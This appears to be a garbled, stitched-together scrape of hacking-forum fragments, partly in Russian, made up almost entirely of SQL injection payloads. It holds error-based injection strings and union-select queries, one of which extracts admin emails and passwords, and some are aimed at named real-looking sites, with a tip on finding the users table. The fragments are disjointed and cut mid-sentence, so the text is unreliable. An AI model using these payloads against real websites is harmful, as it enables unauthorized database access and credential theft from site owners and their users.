AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))) +.
-999.9+union+all+select+%27R3DM0V3_hvj_injection',null%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL
0x39313335313435363237322e39 is just the hex text of 91351456272.9. Why 999999.9?
999999.9+union+all+select+%27R3DM0V3_hvj_injection',null
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,null,null,null+from+ABCDEF. Click to expand... Если ABCDEF заменить на USERS - запроспроходит. Далее подбираем поля
...site.net/lt/y.php?t=999999.9'+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,unhex(Hex(cast(a_admin.email+as+char))),0x5e,unhex(Hex(cast(a_admin.password+as+char))),0x5e
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.
...all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like